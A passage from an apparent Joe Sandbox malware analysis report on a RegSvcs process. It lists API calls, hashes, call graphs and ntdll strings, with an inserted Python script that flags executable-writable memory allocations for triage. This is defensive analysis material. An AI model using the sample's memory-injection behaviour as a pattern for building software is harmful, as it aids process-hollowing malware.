PostThreadMessageW 99942->99943 99944 408370 99942->99944 99943->99944 99944->99864 99946 40f683 99945->99946 99952 419e90 99946->99952 99950 41af60 LdrLoadDll 99949->99950 99951 419d6c 99950->99951 99951->99872 99953 419eac 99952->99953 99954 41af60 LdrLoadDll 99952->99954 99957 18a2dd0 LdrInitializeThunk 99953->99957 99954->99953 99955 40f6ae 99955->99864 99957->99955 99958->99794 99960 41af60 LdrLoadDll 99959->99960 99961 419fdc 99960->99961 99964 18a2f30 LdrInitializeThunk 99961->99964 99962 40f4fe 99962->99800 99962->99801 99964->99962 99965->99807 99966->99812 99967->99817 99968 18a2ad0 LdrInitializeThunk

                                            Control-flow Graph (rendered as an interactive graph in the original; the executed/not-executed colouring is not preserved here)
                                            • Block 41a40a-41a459: call 41af60, then NtReadFile
                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1JA$rMA$rMA
                                            • API String ID: 2738559852-782607585
                                            • Opcode ID: a7eca75e32f3bedc7f05746b1ab66bcae00299feea27d4f1c67943bcdc7498c0
                                            • Instruction ID: 6fb213b5ecae9b2d78436e96d981fe4cc20fd8036c0d356658e2c76b782acd04
                                            • Opcode Fuzzy Hash: a7eca75e32f3bedc7f05746b1ab66bcae00299feea27d4f1c67943bcdc7498c0
                                            • Instruction Fuzzy Hash: F0F0F4B2200118ABCB08DF99DC80EEB77ADEF8C754F158248BE0D97241D630E811CBA0

                                            Control-flow Graph
                                            • Block 41a410-41a426 -> 41a42c-41a459 (NtReadFile) directly or via 41a427 (call 41af60)
                                            APIs
                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 1JA$rMA$rMA
                                            • API String ID: 2738559852-782607585
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

                                            Control-flow Graph
                                            • Block 41a3b2-41a3b6 -> 41a39c-41a3b1 (NtCreateFile) or -> 41a3b8-41a3d6; 41a3b8-41a3d6 -> 41a3dc-41a409 directly or via 41a3d7 (call 41af60)
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: ee52b71bc56ba8f75eac640c797a2694eba69458283401c77e7ab256cfbac458
                                            • Instruction ID: a7a1a1cfa9bd20287bf16b9f77af049775cbda1b728cc0b5c91c8d781c512f10
                                            • Opcode Fuzzy Hash: ee52b71bc56ba8f75eac640c797a2694eba69458283401c77e7ab256cfbac458
                                            • Instruction Fuzzy Hash: E001EDB6200108AFCB08DF99DC84DEB77ADEF8C724F158659FA1D97290C630E951CBA4

                                            Control-flow Graph
                                            • Block 40acf0-40ad0c -> 40ad14-40ad19 directly or via 40ad0f (call 41cc50); 40ad14-40ad19 -> 40ad1b-40ad1e or -> 40ad1f-40ad2d (call 41d070); 40ad1f-40ad2d -> 40ad3d-40ad4e (call 41b4a0) directly or via 40ad2f-40ad3a (call 41d2f0); 40ad3d-40ad4e -> 40ad50-40ad64 (LdrLoadDll) or -> 40ad67-40ad6a; 40ad50-40ad64 -> 40ad67-40ad6a
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

                                            Control-flow Graph
                                            • Block 41a35b-41a3b1: call 41af60, then NtCreateFile
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 6695f46d939826041cc326eafd9aa07fd4365e6bc78657eca3727a353c5cfd4f
                                            • Instruction ID: f7f4107286774cdf51585c7b95314371371209a0b209ae894d56bd91292c74bc
                                            • Opcode Fuzzy Hash: 6695f46d939826041cc326eafd9aa07fd4365e6bc78657eca3727a353c5cfd4f
                                            • Instruction Fuzzy Hash: 2801B2B2201108AFCB58DF99DC95EEB77A9EF8C754F158248FA0DD7241D630E851CBA4

                                            Control-flow Graph
                                            • Block 41a360-41a376 -> 41a37c-41a3b1 (NtCreateFile) directly or via 41a377 (call 41af60)
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

                                            Control-flow Graph
                                            • Block 41a540-41a57d: call 41af60, then NtAllocateVirtualMemory
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                            APIs
                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 862ab1d74fd6b39137587eef0b780224c3788b65532d327abcc0014471138fb9
                                            • Instruction ID: b3fdf63f4ad5ff6f1f79f001bf06b592d21b89135aeb14a04be9777f4d5fd233
                                            • Opcode Fuzzy Hash: 862ab1d74fd6b39137587eef0b780224c3788b65532d327abcc0014471138fb9
                                            • Instruction Fuzzy Hash: EAE08C712402046BD710EB98CC46FA73BA8EF88724F248499BA0C5B242C131E90187D0
                                            APIs
                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
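The API reference lines above, together with the Memory Dump Source line that follows each of them, are regular enough to be scraped when triaging many reports of this kind. The Python script below is an added example and is not part of the Joe Sandbox report or of its IDA plugin: it parses those lines into records, attributes each call site to its dump region, and applies a heuristic to the NtAllocateVirtualMemory entry. The sample input is copied from the entries above, the constant tables are the standard winnt.h values, and the one assumption is that the bracketed argument list is a raw stack snapshot in which the flag words may sit anywhere (the entry above shows the return address 0041B134 between the 00003000 and 00000040 words), so the check looks for the presence of those words rather than mapping positions to parameters.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed input: API reference and Memory Dump Source lines copied from the
# report entries above, in report order (a function's API lines come first, its
# Memory Dump Source line follows). The last dump has no API lines, as on the page.
REPORT_EXCERPT = """\
• NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
• Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
• Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
• Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
• Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
• Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
"""

# "• Api.Module(arg,...), ref: ADDR" and "• Source File: NAME, Offset: BASE" as the IDA plugin prints them.
API_RE = re.compile(r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SOURCE_RE = re.compile(r"^•\s*Source File:\s*(?P<dump>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+)")
HEX_RE = re.compile(r"[0-9A-Fa-f]+")

# Standard winnt.h constants; only these are decoded.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET", 0x100000: "MEM_TOP_DOWN"}
ALLOC_MASK = sum(ALLOC_TYPE)  # the bits are distinct, so the sum is their OR

@dataclass
class ApiRef:
    api: str
    module: str
    args: list        # raw snapshot words; "?" means the plugin could not resolve the word
    ref: int          # address of the call instruction
    region: str = ""  # "Offset:" of the memory dump that contains the call site

def parse_api_refs(text):
    """API lines are attributed to the Memory Dump Source line that follows them."""
    refs, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            pending.append(ApiRef(m["api"], m["module"], m["args"].split(","), int(m["ref"], 16)))
            continue
        m = SOURCE_RE.match(line)
        if m:
            for r in pending:
                r.region = m["offset"]
            refs.extend(pending)
            pending = []
    return refs

def hex_args(ref):
    """Numeric snapshot words; '?' and string-like words (rMA, 1JA) are skipped."""
    return [int(a, 16) for a in ref.args if HEX_RE.fullmatch(a)]

def decode_protect(value):
    names = [PAGE_PROTECT.get(value & 0xFF, "0x%x" % (value & 0xFF))]
    names += [n for bit, n in ((0x100, "PAGE_GUARD"), (0x200, "PAGE_NOCACHE")) if value & bit]
    return "|".join(names)

def decode_alloc_type(value):
    names = [n for bit, n in ALLOC_TYPE.items() if value & bit]
    return "|".join(names) if names else "0x%x" % value

def apis_by_region(refs):
    """Dump region -> Counter of API names called from code in that region."""
    out = {}
    for r in refs:
        out.setdefault(r.region, Counter())[r.api] += 1
    return out

def flag_rwx_allocs(refs):
    """Heuristic: the plugin prints a raw stack snapshot (return addresses such as
    0041B134 sit between the flag words), so positions cannot be mapped to
    NtAllocateVirtualMemory parameters. Flag a call when the snapshot holds both a
    word made only of commit/reserve bits and an execute+write protection word."""
    hits = []
    for r in refs:
        if r.api != "NtAllocateVirtualMemory":
            continue
        vals = hex_args(r)
        has_alloc = any(v and not v & ~ALLOC_MASK and v & 0x3000 for v in vals)
        has_rwx = any(v in (0x40, 0x80) for v in vals)
        if has_alloc and has_rwx:
            hits.append(r)
    return hits

if __name__ == "__main__":
    refs = parse_api_refs(REPORT_EXCERPT)
    for region, counts in apis_by_region(refs).items():
        print("region %s: %s" % (region, dict(counts)))
    for r in flag_rwx_allocs(refs):
        words = {decode_protect(v) if v in (0x40, 0x80) else decode_alloc_type(v)
                 for v in hex_args(r) if v in (0x40, 0x80) or (v and not v & ~ALLOC_MASK)}
        print("RWX allocation at %08X: %s" % (r.ref, ", ".join(sorted(words))))
```

Run stand-alone, the script prints one line per dump region (only 00400000 has call sites in this excerpt; the 01830000 dump lists LdrInitializeThunk entries without a resolved call reference) and one line for the allocation at 0041A579, whose snapshot holds 00003000 (MEM_COMMIT|MEM_RESERVE) and 00000040 (PAGE_EXECUTE_READWRITE). Treat that flag as a prompt to look at the function at 41a540 in the dump, not as proof of which values were actually passed.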
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:

                                            Control-flow Graph
                                            • control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                            APIs
                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                            Strings

                                            Control-flow Graph
                                            • control_flow_graph 9 41a6ab-41a6ac 11 41a64c-41a661 RtlAllocateHeap 9->11 12 41a647 call 41af60 9->12 12->11
                                            APIs
                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                            Strings

                                            Control-flow Graph
                                            • control_flow_graph 215 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 224 40835c-40836e PostThreadMessageW 215->224 225 40838e-408392 215->225 226 408370-40838a call 40a480 224->226 227 40838d 224->227 226->227 227->225
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

                                            Control-flow Graph
                                            • control_flow_graph 230 408310-40831f 231 408328-40835a call 41ca00 call 40acf0 call 414e50 230->231 232 408323 call 41be60 230->232 239 40835c-40836e PostThreadMessageW 231->239 240 40838e-408392 231->240 232->231 241 408370-40838a call 40a480 239->241 242 40838d 239->242 241->242 242->240
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

                                            Control-flow Graph
                                            • control_flow_graph 260 41a7c2-41a7c9 261 41a7a3-41a7c0 260->261 262 41a7cb-41a7ea call 41af60 260->262 265 41a7ef-41a804 LookupPrivilegeValueW 262->265
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800

                                            Control-flow Graph
                                            • control_flow_graph 277 41a670-41a6a1 call 41af60 RtlFreeHeap
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3e1e99cafa39d71fecc10e5af6958517371e8321510b08f282d64324b66b16b0
                                            • Instruction ID: 91e6ff77d60969ba2104efb513c3c30701053e1d2cfd39a77ba95affe8470a3a
                                            • Opcode Fuzzy Hash: 3e1e99cafa39d71fecc10e5af6958517371e8321510b08f282d64324b66b16b0
                                            • Instruction Fuzzy Hash: 2DB09B719015C5CAEA11E7644A08717790577D1701F55C061D3034651F4738C2D5E676
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2160512332
                                            • Opcode ID: 351dbd1d1f9626c983c490a91a4bd5b3402c6457c3fb2d37faae8cb2803bddc2
                                            • Instruction ID: a306e328559e54c3a75135fb65861319b4abcdb848c54d2aac584846828c809d
                                            • Opcode Fuzzy Hash: 351dbd1d1f9626c983c490a91a4bd5b3402c6457c3fb2d37faae8cb2803bddc2
                                            • Instruction Fuzzy Hash: 0C92DF71608346AFE721DF28C888F6BB7EABB85714F04481DFA94D7251D770EA44CB92
                                            Strings
                                            • corrupted critical section, xrefs: 018D54C2
                                            • Thread is in a state in which it cannot own a critical section, xrefs: 018D5543
                                            • Critical section address., xrefs: 018D5502
                                            • 8, xrefs: 018D52E3
                                            • Critical section address, xrefs: 018D5425, 018D54BC, 018D5534
                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018D54CE
                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018D54E2
                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018D540A, 018D5496, 018D5519
                                            • Critical section debug info address, xrefs: 018D541F, 018D552E
                                            • undeleted critical section in freed memory, xrefs: 018D542B
                                            • Address of the debug info found in the active list., xrefs: 018D54AE, 018D54FA
                                            • Thread identifier, xrefs: 018D553A
                                            • double initialized or corrupted critical section, xrefs: 018D5508
                                            • Invalid debug info address of this critical section, xrefs: 018D54B6
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                            • API String ID: 0-2368682639
                                            • Opcode ID: 5f7ce4c2c4ce2ca8599f2f6b9c6ffe527bdae050c908494a625a08491950a001
                                            • Instruction ID: 0620eb73e289c4cf88dfec7b7694b7e7b82cf28ac8661c07c1df2ec276af675f
                                            • Opcode Fuzzy Hash: 5f7ce4c2c4ce2ca8599f2f6b9c6ffe527bdae050c908494a625a08491950a001
                                            • Instruction Fuzzy Hash: 8481ACB1A41349EFDB21CF99C884BAEBBB5FB0AB14F14411AF505F7240D775AA40CB90
                                            Strings
                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 018D2412
                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 018D2624
                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 018D2506
                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018D24C0
                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 018D2602
                                            • @, xrefs: 018D259B
                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 018D261F
                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018D25EB
                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018D22E4
                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 018D2498
                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 018D2409
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                            • API String ID: 0-4009184096
                                            • Opcode ID: 64bc95636d0c7f0b2cbcb59579e3e37647f51c9ce88a81ee198f053bd6c5eb10
                                            • Instruction ID: c58adea46d63e78393972b58942c742d72fe13ba4dc6b140fe64dea789b2f32a
                                            • Opcode Fuzzy Hash: 64bc95636d0c7f0b2cbcb59579e3e37647f51c9ce88a81ee198f053bd6c5eb10
                                            • Instruction Fuzzy Hash: 610250B1D00269AFDF31DB58CC80B9AB7B9AF54318F4441DAA609E7241EB709F84CF59
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                            • API String ID: 0-2515994595
                                            • Opcode ID: d6eda908af9c886a02d00bba650c8a50af6c2113c836608e2b637a688208027d
                                            • Instruction ID: 3796c00efc7fabe2329871ceacf7892311533be66528b867f9b07facc6e8e944
                                            • Opcode Fuzzy Hash: d6eda908af9c886a02d00bba650c8a50af6c2113c836608e2b637a688208027d
                                            • Instruction Fuzzy Hash: FB518EB1A04315AFD726DF188844BABBBECAF94750F144A1DEA9DC2281E770D609C792
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 0-1700792311
                                            • Opcode ID: ad575231fad2d3ad13a2eb6304901087ddc875b52ae4b2d32f640854e15854c5
                                            • Instruction ID: 533b334302240e05703be164d7095098120d59572ad315e9f7b4b75d0b4f7511
                                            • Opcode Fuzzy Hash: ad575231fad2d3ad13a2eb6304901087ddc875b52ae4b2d32f640854e15854c5
                                            • Instruction Fuzzy Hash: F4D1F031604689DFDB22DF68C440AADBBF6FF5A700F0C8449F8499B256E7369AC1CB51
                                            Strings
                                            • VerifierDebug, xrefs: 018E8CA5
                                            • AVRF: -*- final list of providers -*- , xrefs: 018E8B8F
                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 018E8A67
                                            • HandleTraces, xrefs: 018E8C8F
                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 018E8A3D
                                            • VerifierFlags, xrefs: 018E8C50
                                            • VerifierDlls, xrefs: 018E8CBD
                                            Memory Dump Source
